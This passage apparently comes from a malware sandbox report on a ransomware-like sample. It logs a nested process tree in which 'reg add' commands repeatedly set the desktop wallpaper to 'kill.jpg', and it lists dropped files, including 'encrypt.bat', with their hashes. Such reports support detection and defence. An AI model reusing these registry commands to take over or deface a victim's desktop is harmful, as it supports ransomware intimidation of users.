                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              28⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      20⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:64
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3764,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4632,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4652 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4620,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5032 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5440,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5468,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=5888,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5968 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=6272,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1496
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4012,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:768

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Encrypt\encrypt.bat

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          59094544993f4727a85d62f55ea66f17

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          39a125f1d71b596e57d14c2865626b95825f1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          9b70930727653b6b647554cf3bd508fe9ba4981aaebcbeed91f7270653d679ca

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          48f15e70f9e800533e3869b527d4cae504ef04a2fea38c9aa1f2bb541fd1fa559979a6b7e802da067b52a98202387fd5b9023dfa09f85d67c8c7b759f73a4774

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          eb1ad317bd25b55b2bbdce8a28a74a94

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          98a3978be4d10d62e7411946474579ee5bdc5ea6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d8cb3e9459807e35f02130fad3f9860d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5af7f32cb8a30e850892b15e9164030a041f4bd6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          15dde0683cd1ca19785d7262f554ba93

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d039c577e438546d10ac64837b05da480d06bf69

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2117cf9865e42aacdfc8925e05fe4031

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          f89be0d1409b864d85da2479dbcf4382b9a8e888

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          97ed8e4e2f74329c27b63cc9b72b4af1cdc51c4dc014725b80b51da93b91192d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          83e12e1658ae4bf6b89edaa04e3e81492b9d25990745ab429ebf861915826512213ac9accc1323a5f3d71a821c07ff9010aa8772eb6b0bf6a93649b3ca112166

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          c6eeae2b8c20a613e264c31e93319fa3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1d35c414ff9078d31fe36f243143f3a340872953

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1fff11c3a0217aa5cefc4bff221979d45517869a1830ed69f99e6b7d68f6cbb3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7895e4a1cc49313cde6baf8642e42466f8813b79f140368ac065e484b121c25ba7d80d9da2b75b7079a3712632e8a79b54bf4b68a1067b6555a836b71b321312

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3072fa0040b347c3941144486bf30c6f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          e6dc84a5bd882198583653592f17af1bf8cbfc68

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          da5c82b0e070047f7377042d08093ff4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          89d05987cd60828cca516c5c40c18935c35e8bd3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          fd98baf5a9c30d41317663898985593b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          ea300b99f723d2429d75a6c40e0838bf60f17aad

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          9d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          944B

